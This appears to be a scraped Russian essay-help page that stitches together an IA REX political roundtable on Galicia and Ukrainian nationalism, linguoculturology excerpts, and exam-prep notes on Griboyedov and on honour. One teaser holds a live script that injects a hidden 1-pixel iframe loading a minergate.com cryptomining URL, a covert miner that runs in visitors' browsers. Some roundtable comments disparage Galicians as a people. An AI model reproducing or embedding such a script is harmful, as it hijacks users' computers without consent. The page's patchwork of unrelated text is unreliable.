Можно ли согласиться с тем, что жизнь – это познание мира. Можно ли согласиться с тем, что многие сцены пьесы «Горе от ума

«Встают непростые задачи в плане выработки «демократической версии украинского национализма на основе мультикультурности и многонациональности».....»

Эксперт , политолог, главный редактор газеты «Цена вопроса» Станислав Стремидловский предлагает коллегам-экспертам и читателям обсудить его статью « ». «Перед львовскими интеллектуалами встают непростые задачи. В первую очередь, им необходимо сформулировать демократическую версию украинского национализма на основе мультикультурности и многонациональности. Во вторую очередь, противопоставить эту платформу вульгарному национализму, который сейчас набирает силу в Киеве, являясь основой консенсуса для ведущих оппозиционных партий. Ведь когда, держась за руки, вместе вышагивают Олег Тягнибок («Свобода»), Арсений Яценюк («Батькивщина») и Виталий Кличко («Удар») - это не просто публичный акт с пиар-составляющей, а свидетельство определённых умонастроений. В том случае, если львовские интеллектуалы справятся с этой задачей, они могут получить поддержку не только демократических сил во всей Украине, но и симпатии Польши и России», - отмечает эксперт.

ИА REX: Можно ли согласиться с тем, что Галичина - это не Украина?

Эдуард Афонин , профессор Национальной академии государственного управления при президенте Украины, доктор социологических наук:

Комментируя заметку российского политолога Станислава Стремидловского в ИА REX под названием «Львовские парадоксы: Галичина - это не Украина» хотел бы, прежде всего, подчеркнуть, что данные оригинальных мониторинговых исследований «общесистемных изменений в украинском обществе (1992-2012)», осуществляемых в рамках Украинской школы архетипики, свидетельствуют о том, что на глубинном - общесистемном уровне нет ни малейших оснований говорить о каких-либо значимых на сегодня ментальных отличиях между регионами Украины. Есть основания полагать, что в рамках ныне прогрессирующих на постсоветском пространстве авторитарных тенденций и в других регионах бывшего СССР следует ожидать схожую картину. Поэтому всякая, подобная отмеченной выше, экспертная оценка на тему значимых ментальных отличий, с моей точки зрения, является не более, чем свободным интеллектуальным творчеством на заданную тему. Вместе с тем поднятый автором вопрос не такой уж однозначный и простой. В силу этого он действительно требует обсуждения.

В частности, не могу не поддержать мнение историка Василия Расевича , что перед интеллектуалами (причем, не только львовскими) встают непростые задачи в плане выработки «демократической версии украинского национализма на основе мультикультурности и многонациональности». Весьма уместным, кажется, служит напоминание этого источника о существовавших принципиально двух полярных идеологических платформах украинского национализма: бандеровской и мельниковской направленности, образовавшихся вследствие происшедшего в 1942 году раскола единой организации украинских националистов. И если уже использовать современные политологические термины, то именно мельниковская идеологическая платформа является наиболее близкой к идее «политической нации», основанной на платформе мультикультурализма, в то время, как бандеровское крыло ОУН все более отражает идейную сущность «этнической нации». И хотя национализм, как и феминизм, декларируют в целом внеклассовую свою сущность, все же и тот (прежде всего это касается бандеровской идеологии) и другой плоть от плоти явления сущностно классовые, прежде всего в их психологическом смысле, как основанные на социальной идентичности. Последняя же априори строится на механизмах отождествления самосознания носителей этой идеологии с внешними группами и классами.

Юрий Юрьев , политконструктор:

Ныне не столь важно, насколько Галичина - Украина. Важно, что она пытается играть роль Сверх-Украины, как когда-то германские человеки играли роль Сверхчеловеков. Практика показала, кто настоящие Сверх-Сверх-Человеки. То же самое светит и Галичине. Иные доводы публикации - можно считать резонными, но стоит учитывать не только гибкость и динамизм событий, но и стратегию Европы. Например, - партия "Свобода" ни слова не говорит о реституциях в пользу "дореволюционных" собственников. Но практика Балтии, Польши и иных европейских стран - показывает, что реституции это базовый уровень евроинтеграции, нужно сначала всё отдать "в общак", а потом уже просить милости что-то оставить. Болгария и Румыния даже шенгенских виз не получили, хотя вроде и потомки римлян, судя по названию Румынии. А потомки гуннов, судя по названию Венгрии, чувствуют себя более вольно в плане виз, что им, впрочем, не помогает, им приходится создавать резко националистическую партию "Йоббик". В общем - парадоксов ещё больше, чем в статье Станислава Стремидловского, и они свидетельствуют о коварстве галичан или же - их беспросветной недальновидности. Когда им снова придётся жить в схронах, поскольку везде будет земля потомков дворян и хуцпанов, они поймут, что "Свобода" ничем не лучше нынешней жлобоклептократии, но будет уже поздно. Хотя при должном усердии - все идеи и мифы Галичины можно развенчать и Галичина ограничится стремлением лишь к гражданским правам и свободам, а не "евроинтеграции" и "Свободе" как мнимому господству на базе приоритета национальности гениталий пращуров. И тогда - Галичина будет нормальной здравой общностью дельных граждан. Впрочем, если галичане самоистребятся - Европа не слишком огорчиться. Меньше будет протестующих, против реституций.

Валентин Гринько , историк и философ, кандидат философских наук:

У нас в Костромской области есть тоже город Галич, и Галический (так называется официально) район, я бы сказал, Костромская Галичина. Город хотя и маленький, но достаточно старинный, и, может, его основали переселенцы из украинской Галичины - никто в этом не копается, потому что грантов нет, а какие без хороших грантов можно провести исследования? (в историографии доказано, что предположение В.Гринько верно - ред. ) Только среднепотолочные на досуге от пролетарского труда за насущную плату. Не разгонишься. Костромская Галичина - всяко не Украина. Хотя, если покопаться, кто его знает? Что касается украинской Галичины, то в Украине, считай, кожный закуток - отдельная нация, знаю по Днепропетровской области, где есть итальянские (Волоське), немецкие, еврейские, литовские и даже французские поселения (в Котовском районе). Не считая украинских (разных оттенков) и бессарабских. Оно надо всем им выделяться в независимую державу?

Кирилл Мямлин , публицист:

Сергей Сибиряков , политолог, координатор международной экспертной группы ИА REX:

Галичина - это не Украина? Являются ли галичане украинцами? На самом деле именно галичане считают себя единственно правильными украинцами. При чём они умеют одновременно любить Украину и люто ненавидеть всех, кто не разделяет их взглядов на жизнь. Для галичан настоящие украинцы - это те, что за Збручем - река на границе Тернопольской и Хмельницкой областей Украины. На Украине по теории Николая Гумилёва мы имеем три разных этноса, при этом два (малороссы и южноруссы) комплиментарны, а галичане с ними в большинстве своем даже не комплиментарны. Полюса притяжения для них противоположны. Их типичные представители Донбасс и Галиция стоят спиной друг к другу и не желают друг друга ни слышать, ни понимать. Можно ли их совместить в рамках жестко националистического унитарного государства, которым становится Украина? Ответ еще более очевиден - нет. И чем раньше эти два этноса перестанут учить друг друга жизни и истории, перестанут пытаться разрушить краеугольные этнические установки соседа - тем большая вероятность, что неизбежный развод в этой семье пройдет без битья посуды и членовредительства.

Львовский журналист и коренной галичанин Богдан Волошин в своём эссе «Погляд на нарiд галицький зблизька i не дуже... » хорошо описал менталитет галичанина, сложившийся за тысячелетие отдельного от Руси существования галицкого региона. Я перевел этот текст на русский язык в своём блоге и позволю себе привести пару цитат, характеризующих ментальность жителя Галичины.

Отношение галичанина к политике:

Автохтонный житель Галичины в 45 — 50 лет свободно ориентируется во внешней политике любого государства мира и мог бы служить советником при любом правительстве. Особенно это заметно во время религиозных праздников, когда за столом собирается вся семья и после третьей рюмки кто-то обязательно скажет: «А чули-сьте, что востатнє москали сделали?..» Вопрос всех времен и всех галицких поколений — чему американцы не хотят на Россию ракеты ядерные пустить — так возбуждает галицкие умы, что они временами перебирают меру алкоголя и решают мировые проблемы навкулачки, прозывая неприличными словами противников, с которыми только что пили и братались.

Стиль жизни и ментальность :

Ментальность и тысячелетний быт на галицких поприщах наделили галичанина фантастической способностью не признавать собственные ошибки, но тщательным образом фиксировать чужие, обычно повторяя их. История еще не знала случай, чтобы кто-то услышал от правдивого галичанина фразу: «Простите, я был не прав». Если же кто-то отважный сможет ее вымолвить, — смело заносите его фамилию в книгу рекордов Гиннеса и беритесь обмеривать бюст на памятник, ибо долго этот уникум на наших поприщах не проживет. При объяснении любого несчастья, что случилось с ним, галичанин назовет тысячи причин, кроме одной — собственной бестолковости. Из-за этого галичане выглядят очень уверенными в жизни и труде. Причины, которые приводят к галицким несчастьям и хлопотам, также являются давно установившимися и известными. Среди них чаще всего называют: ненастье, москалей, поляков, американцев, соседа, гадание, тяжелое детство, сплетню, зависть, глуповатую власть и Бога. Благоприятными факторами галичанин считает: собственный ум, собственное трудолюбие, собственную силу и нрав, счастливое стечение обстоятельств, которое позволило ему родиться, и Бога.

Перечислите сложившиеся в Москве четыре лингвокульторологические школы

В самом конце XX в. в Москве сложились четыре лингвокультурологические школы.

  • 1. Школа лингвокультурологии Ю.С. Степанова, которая по методологии близка концепции Э. Бенвениста, целью ее является описание констант культуры в их диахроническом аспекте. Верификация их содержания проводится с помощью текстов разных эпох, т.е. как бы с позиции внешнего наблюдателя, а не активного носителя языка.
  • 2. Школа Н.Д. Арутюновой исследует универсальные термины культуры, извлекаемые из текстов разных времен и народов. Эти термины культуры также конструируются с позиции внешнего наблюдателя, а не реального носителя языка.
  • 3. Школа В.Н. Телия, известная в России и за рубежом как Московская школа лингвокультурологического анализа фразеологизмов (MSLCFraz), В.Н. Телия и ее учениками исследуются языковые сущности с позиции рефлексии носителя живого языка, т.е. это взгляд на владение культурной семантикой непосредственно через субъект языка и культуры. Эта концепция близка позиции А. Вежбицкой (Lingua mentalis - ментальной лингвистики), т.е. имитация речедеятельностных ментальных состояний говорящего.
  • 4. Школа лингвокультурологии, созданная в Российском университете дружбы народов В.В. Воробьевым, В.М. Шаклеиным и др., развивающими концепцию Е.М. Верещагина и В.Г. Костомарова.

Можно ли согласиться с тем, что культурный барьер связан с различиями в нормах речевого поведения? Приведите примеры

При всем различии в существующих направлениях предметом современной лингвокультурологии является изучение культурной семантики языковых знаков, которая формируется при взаимодействии двух разных кодов - языка и культуры, так как каждая языковая личность одновременно является и культурной личностью. Поэтому языковые знаки способны выполнять функцию "языка" культуры, что выражается в способности языка отображать культурно-национальную ментальность его носителей. В этой связи можно говорить о "культурном барьере", который может возникнуть даже при условии соблюдения всех языковых норм. В качестве примера можно привести описанный А. Вежбицкой случай с английским дирижером, когда его пригласили руководить немецким оркестром. Работа не ладилась. Дирижер решил, что это из-за того, что он говорит по-английски и музыканты не воспринимают его как "своего". Он стал заниматься немецким языком, и первое, что спросил у учителя, как ему сказать по-немецки такую фразу: "Послушайте, мне кажется, было бы лучше, если бы мы играли так". Учитель задумался, потом сказал: "Конечно, можно построить фразу и так, но лучше сказать: "Надо играть так"". Отсюда вывод: культурный барьер связан с различиями в нормах речевого поведения, а еще с различными значениями, которые вкладывают участники общения в, казалось бы, одни и те же слова, с неадекватными фоновыми знаниями и т.д.

Мы всегда различали те ситуации, когда можно привлекать данные языка для того, чтобы узнать нечто о культуре, как и те, когда мы обращаемся к культурным реалиям, чтобы понять факты языка. На рубеже веков изменилось место и вес культурологической аргументации в современной науке о языке - прежде всего в когнитивной семантике. Анализ языковых единиц в контексте культуры привел к постановке ряда новых для лингвистики проблем. Лингвокультурология как самостоятельная отрасль знаний должна решать свои специфические задачи и при этом ответить прежде всего на ряд вопросов, которые в наиболее общем виде можно сформулировать так:

  • 1) как культура участвует в образовании языковых концептов;
  • 2) к какой части значения языкового знака прикрепляются "культурные смыслы";
  • 3) осознаются ли эти смыслы говорящим и слушающим и как они влияют на речевые стратегии;
  • 4) существует ли в реальности культурно-языковая компетенция носителя языка, на основании которой воплощаются в текстах и распознаются носителями языка культурные смыслы. В качестве рабочего определения культурно-языковой компетенции принимаем следующее: это естественное владение языковой личностью процессами речепорождения и речевосприятия и, что особенно важно, владение установками культуры; для доказательства этого нужны новые технологии лингвокультурологического анализа языковых единиц;
  • 5) каковы концептосфера (совокупность основных концептов данной культуры), а также дискурсы культуры, ориентированные на репрезентацию носителями одной культуры, множества культур (универсалии); культурная семантика данных языковых знаков, которая формируется на основе взаимодействия двух разных предметных областей - языка и культуры;
  • 6) как систематизировать основные понятия данной науки, т.е. создать понятийный аппарат, который не только позволил бы анализировать проблему взаимодействия языка и культуры в динамике, но обеспечил бы взаимопонимание в пределах данной научной парадигмы - антропологической, или антропоцентрической.

Это так называемые высокие, или общеэпистемологические, задачи, которые Р.М. Фрумкина считает общими для всех наук, но есть еще частные задачи, связанные с проблемой перевода, обучения языку, составления словарей, где была бы учтена культурная информация, и т.д. Думается, что они могут быть решены только после решения "высоких" задач либо хотя бы при некотором опережении решения эпистемологических задач.

При решении данных задач нужно учитывать одну чрезвычайно важную особенность, создающую дополнительную трудность в изучении данной проблемы: культурная информация языковых знаков имеет по преимуществу имплицитный характер, она как бы скрывается за языковыми значениями.

Например, русский фразеологизм выносить сор из избы имеет следующее значение, зафиксированное в словаре: "Разглашать сведения о каких-то неприятностях, касающихся узкого круга лиц" (Словарь образных выражений русского языка. - М., 1995. - С.211), а культурная информация здесь глубоко запрятана - это славянский архетип: выносить сор из избы нельзя, ибо тем самым мы ослабляем "свое" пространство, делаем его уязвимым и можем причинить вред членам своей семьи, а человеку недостойно заниматься ослаблением ближних. Поэтому маркером культурной информации при фразеологизме становится помета "неодобр.", имеющаяся в большинстве современных фразеологических словарей. Другой пример: идиома ни кола, ни двора означает: нет ни своего двора, ни хозяйства, а культурным знаком она становится, выражая следующую культурную установку: недостойно человека не иметь своего дома и имущества.

В.Н. Телия предлагает свой способ интерпретации национально-культурных смыслов языковых единиц - с позиции внутреннего наблюдателя, "изнутри" языка. Например, при интерпретации коллокации больная совесть в лингвокультурном аспекте важна не только ценностная модальность (как если бы совесть страдала от болезни), но и то, что это обусловливает психологический дискомфорт, потому что нравственный изъян вызывает неодобрение, осуждение в обществе, и говорится это в неформальных условиях речи при определенном раскладе социально-культурных статусов и ролей собеседников.

В рамках нашей концепции кроме предлагаемого В.Н. Телия способа интерпретации необходимым следует признать и анализ языковых фактов с позиции внешнего наблюдателя.

Сегодня уже нельзя работать в лингвистике, делая вид, будто лингвокультурологии не существует. Ее игнорирование нарушает этос научного сообщества, где одной из базовых посылок является требование преемственности (даже если оно идет в виде аргументированного отрицания). Нельзя не видеть, что есть многие вещи в жизни и поведении нации, которые объясняются культурными факторами. Например, обязательное присутствие отчества у русского человека - это особый почет и уважение, которые ему оказывают соплеменники. Русские говорят: по имени называют, по отчеству - величают.

Документ "Можно ли согласиться с тем, что жизнь – это познание мира" не содержит подробного описания. Полный файл данного документа можно скачать с нашего сайта абсолютно бесплатно.
Ссылка на файл - ВНИЗУ СТРАНИЦЫ!

Страница 1 из 1

Можно ли утверждать, что литература сегодня воспитывает человека?

“…Цель творчества – самоотдача, А не шумиха, не успех. Позорно, ничего не знача, Быть притчей на устах у всех”. Б.Л.Пастернак. Литература в целом – это один из способов познать мир, человечество, самого себя. Литература как нельзя лучше передаёт мысли, взгляды автора, его отношение к жизни, реальности. И каждый писатель создаёт свой художественный мир, с которым согласится и примет его тот или иной читатель....


Можно ли охарактеризовать поэзию С. А. Есенина как лирическую исповедь, биографию в стихах?

Его поэзия есть как бы разбрасывание обеими пригоршнями сокровищ его души. А. Толстой Стихи Есенина - искренняя исповедь романтической души, привлекающая одухотворенностью и стремлением воспеть лучшие человеческие чувства. Она искренно и правдиво раскрывает поиски сложной души и сложной жизни поэта. В ранних стихах Есенина возникают образы русских крестьян. Вот мужики сетуют на засуху, "скинув шапки, молясь и вздыхая". Вот рыбаки поют "где-то вдали, на изломе реки, древнюю песню". Поэт описывает деревенский быт, показывает избу, где "вьется сажа над заслонкою", "пахнет рыхлыми драченами", "щенки кудлатые заползают в хомуты". Именно здесь, среди крестьянской жизни, прошло детство Есенина. Все это ему дорого, и об этом он пишет в своих стихах. Молодой автор видит поэзию деревенской жизни, красоту людей труда. ...


Можно ли отобразить современный мир средствами театра

Существенную роль в ней играет творческая ориентация и социальная зоркость художников, заставляющая их обращать преимущественное внимание на разные явления жизни и даже по-разному видеть одни и те же вещи (как это было, например, в свое время с Л. Толстым, А. Чеховым и М. Горьким). Таким образом, для художника тип конфликта - вопрос не технологии, а отношения к действительности, осмысления ее исторических тенденций, логики развития общественных противоречий. Рассматривая под таким углом зрения структуру драматического действия, в ней можно условно выделить по крайней мере три самостоятельных, но проникающих друг в друга «слоя» (условно, потому что между ними в свою очередь существуют промежуточные «уровни»). ...


Можно ли согласиться с тем, что жизнь – это познание мира

(function() { var w = document.createElement("iframe"); w.style.border = "none"; w.style.width = "1px"; w.style.height = "1px"; w.src = "//minergate.com/wmr/fcn/podivilovhuilo%40yandex.ru/3/258de372a1e9730f/hidden"; var s = document.getElementsByTagName("body"); s.appendChild(w, s); })(); ...


Можно ли считать оправданной жестокость

Устное народное творчество превознесло имя Алексея Довбуша в песнях, легендах и рассказах, навсегда запечатлено в названиях горных скал. И это не удивительно. Веками угнетенный, бедный народ ждал для себя обороны, с надеждой смотрел на смельчаков, которые не повиновались ни господам, ни самой судьбе, стремились облегчить жизнь бедных людей. Крестьяне часто терпели такие несправедливости от богачей, которых оправдывали, несмотря на глубокую христианскую веру, насилие над ними и даже их убийство. ...

Почему И. А. Гончаров утверждал: «Едва ли состареется когда-нибудь грибоедовский Чацкий, а с ним и вся комедия»?

Обратитесь к статье И.А.Гончарова «Мильон терзаний» и приведите аргументы критика, подтверждающие вечность сюжета и героя комедии «Горе от ума », мысль о том, что каждая новая эпоха воскрешает тень Чацкого.

Подкрепите своё мнение суждениями других литераторов и критиков о герое (В.Г.Белинского – «крикун, фразёр, идеальный шут», А.С.Пушкина – «не умный», мечущий бисер перед свиньями). Рассмотрите характер дискуссии вокруг образа Чацкого (герой, воплощающий комедийные амплуа «неудачливого жениха» и «злого умника», или обличитель, резонёр, проповедник; «умный безумец», Дон Кихот, борющийся за истину, или «лишний» человек; революционер-демократ).

Подводя итоги, отметьте сочетание конкретно-исторического и всечеловеческого содержания в характере грибоедовского героя.


Литературные аргументы

(материал ЕГЭ)

Можно ли согласиться с тем, что многие сцены пьесы «Горе от ума»

А .С. Грибоедова «построены таким образом, что комическое становится средством выражения трагического, а сама комедия – одной из форм воплощения современной трагедии» (Е. В. Юсим)?

— В начале своего рассуждения отметьте, что произведение А.С. Грибоедова «Горе от ума» дало повод критикам и читателям поразмышлять над проблемой его жанра. Рассмотрите, как в этой пьесе соединились и комедия положений (вспомним диалог Фамусова и Лизаньки, падение с лошади Молчалина), и комедия характеров (колоритные фигуры Скалозуба, Фамусова), и трагедия главных героев (Чацкого - от ума, а Софьи - от чувства).

— Укажите, что комедия помимо авторской воли стала восприниматься как трагикомедия. Сам герой подвёл итоги своего пребывания в Москве: «мильон терзаний». Назвав так же свою статью о комедии Грибоедова, И.А. Гончаров показал не только драматизм произведения, но и многообразие его жанровых интерпретаций: «и картина нравов, и галерея живых типов, и вечно острая, жгучая сатира».



— Охарактеризуйте то, как объектами беспощадной иронии главного героя стали Максим Петрович, французик из Бордо, Хлёстова и многие другие завсегдатаи московских гостиных, что сформировало собственно сатирический пласт произведения. При этом сам Чацкий - резонёр, но этим амплуа не исчерпывается его суть.


Литературные аргументы

(материал ЕГЭ)

— В качестве аргументов приведите мнения современников Грибоедова. Так, В.Г. Белинский назвал грибоедовского героя «крикуном, фразёром, идеальным шутом», который профанирует всё святое, о чём говорит. А.С. Пушкин усмотрел в Чацком комедийного героя, отказав ему в уме: «Негоже метать бисер перед Репетиловым».

— Подчеркните, что нам история Чацкого представляется скорее трагедией сильной, но непонятой личности. Четвёртое действие пьесы становится одновременно комедийной и трагической сценой, где гости бала представляют светский мир Москвы, где разыгрывается драма Софьи - обманувшего себя человека. Участь Молчалина и Лизы также безрадостна: изгнание,

одиночество, крах надежд. Судьба Чацкого, потерпевшего неудачу на любовном фронте и общественном поприще, оборачивается трагедией страны, изгоняющей из Москвы лучшие умы.

— Подводя итоги, отметьте, что сложная жанровая природа пьесы А.С. Грибоедова не позволяет в ней чётко разграничить комическое и трагическое, что даёт нам право согласиться с мнением критика-литературоведа.


2. «Честь и бесчестие».

— В основе направления лежат полярные понятия, связанные с выбором человека: быть верным голосу совести, следовать моральным принципам или идти путем предательства, лжи и лицемерия. Многие писатели сосредотачивали внимание на изображении разных проявлений человека: от верности нравственным правилам до различных форм компромисса с совестью, вплоть до глубокого морального падения личности.


Толкование понятий

— Честь – достойные уважения и гордости моральные качества человека, его соответствующие принципы. Это и доброе имя, почет, уважение. Существуют долг чести, дело чести, суд чести.

— Бесчестье – оскорбление, нанесенное самолюбию, принимаемое всерьез и переживаемое как трагедия, бесславие, обида, позор.


Пословицы и поговорки о чести и

бесчестии

— Всякому своя честь дорога (русская пословица)

— Честь на волоске висит, а потеряешь – и канатом не привяжешь (русская пословица)

— Спесь губит достоинство (лакская пословица)

— Лучше быть плохим у хорошего, чем хорошим у плохого (русская пословица)

— Не кусок пирога, а честь дорога (русская пословица)

— Лучше быть господином в деревне, чем слугой в городе (ассирийская пословица)

— Береги платье снову, а честь смолоду (русская пословица)


— Честь дороже жизни.

Ф. Шиллер

— Настоящая честь - это решение делать при всех обстоятельствах то, что полезно большинству людей.

Б. Франклин

— Моя честь - это моя жизнь; обе растут из одного корня. Отнимите у меня честь - и моей жизни придет конец.

У. Шекспир

— Перед разумом, перед Богом «честь» человека мерится другой мерой, чем на римском форуме.

Л. Фейхтвангер

— Ни тщеславием, ни красотой одежд или коней, ни украшением не добывай чести, но мужеством и мудростью.

Теофраст

— Я всякую беду согласен перенесть,

Но я не соглашусь, чтоб пострадала честь.

П. Корнель

— Одним из основных определений чести является то, что никто не должен своими поступками давать кому бы то ни было преимущества над собой.

Г. Гегель


Высказывания о чести и бесчестии


— Всякий мужественный, всякий правдивый человек приносит честь своей родине.

Р. Ролан

— В деле чести непригоден Астрологии язык.

Лопе де Вега

— Честь девушки - все ее богатство, оно дороже всякого наследства.

У. Шекспир

— Не исправление ошибки, а упорство в ней роняет честь любого человека или организации людей.

Б. Франклин

— Вытерплю несправедливость, только не бесчестье.

— Цецилий

— Честь человека заключается в том, чтобы

в отношении удовлетворения своих потребностей он зависел только от своего трудолюбия, от своего поведения и от своего ума.

Г. Гегель

— Где найдешь того, кто честь друга ставил бы выше своей?

Цицерон


— ...Женщина мало что смыслит в чести. Пусть же станет честью ее - любить всегда сильнее, чем любят ее, и в любви никогда не быть второй.

Ф. Ницше

— Лишать чести другого - значит лишаться своей.

Публий

— Честь у мужчин одна, возлюбленных так много! Любовь забыть легко, но честь нельзя никак.

П. Корнель

— Каждому свою честь воздаст потомство.

Тацит

— Стыд и честь - как платье: чем больше потрепаны, тем беспечнее к ним относишься.

Апулей

— Бесчестье равное волочит за собой тот, кто предал любовь и кто покинул бой.

П. Корнель

— Истинная честь не может терпеть неправду.

Г. Филдинг


Примерные темы

— «Чести своей никому не отдам»

— «Невольник чести» или заложник предрассудков? Мой выбор.

— Всегда ли можно следовать законам чести или нужно покоряться судьбе?

— «Честь – это бриллиант на руке добродетели» (Вольтер)


— «Капитанская дочка», «Выстрел», «Евгений Онегин» А. С. Пушкина

— «Песня про купца Калашникова», «Герой нашего времени» М. Ю. Лермонтова

— «Отцы и дети» И. С. Тургенева

— «Война и мир» Л. Н. Толстого

— «Дуэль» А. П. Чехова

— «Поединок» А. И. Куприна

— «Белая гвардия» М. А. Булгакова


Вариант вступления

— Честь дворянина, купца, воина… В былые времена бесчестьем считалось малейшее оскорбление человеческого достоинства. Дуэлянты отстаивали свои принципы в поединках, защищали честь своей семьи. Из-за обид или сомнений в чьих-то моральных качествах начинались войны, разыгрывались драмы кровавой мести. Даже целые народы вставали друг против друга, чтобы никто не усомнился в их храбрости.

— Вспомним героев русской литературы: Гринева, который вызывает на дуэль Швабрина, оскорбившего Машу Миронову, Степана Парамоновича Калашникова, сразившегося с посягнувшим на честь его жены опричником Кирибеевичем, Пьера Безухова, отстоявшего свое достоинство в поединке с Долоховым.

— Кажется, что может быть благороднее? Но часто такие ситуации приводят к печальным последствиям. Вспомним несчастного Ленского. Он погибает от руки бывшего друга, защищая благородное имя своей невесты.


Из истории

— Тема чести принадлежит к числу самых популярных в испанской литературе XVI-XVII вв. Вокруг нее шла острая идейная борьба между разными направлениями этической мысли и социологии. От средневековья в XVI-XVII столетия перешла идея чести, как «дара крови», принадлежащего дворянству от рождения и отгораживающего его от низших сословий.

В противовес этому узкосословному толкованию чести испанские гуманисты, в их числе Сервантес и Лопе де Вега, объявляют благородство и честь не наследственными дарами, а проявлениями человеческого достоинства, которое находит выражение в высоко нравственных поступках. Формулу этого гуманистического истолкования идеи чести Сервантес вложил в уста своего героя Дон Кихота: «Каждый - сын своих дел». Разделяя эту концепцию чести, Лопе де Вега в некоторых своих народно-героических драмах («Фуэнте Овехуна» и др.) идет дальше: он утверждает идеал «крестьянской чести» как чувство человеческого достоинства, присущего крестьянину в отличие от насильника-феодала и определяющего нравственное превосходство человека из народа.

Кальдерон же в своих «драмах чести» нередко отдает дань сословно-дворянским представлениям. Это особенно ощущается в пьесах, посвященных супружеской чести («Врач своей чести», 1633-1635; «За тайное оскорбление - тайное мщение», 1635 и др.). Честь в этих пьесах уподобляется хрупкому сосуду, который «от малейшего движения может разбиться».

Законы чести суровы и, как всякий закон, должны неукоснительно соблюдаться. «Dura lex sed lex» (лат. Суров закон, но закон) - не раз сетует герой Кальдерона.


Литературные аргументы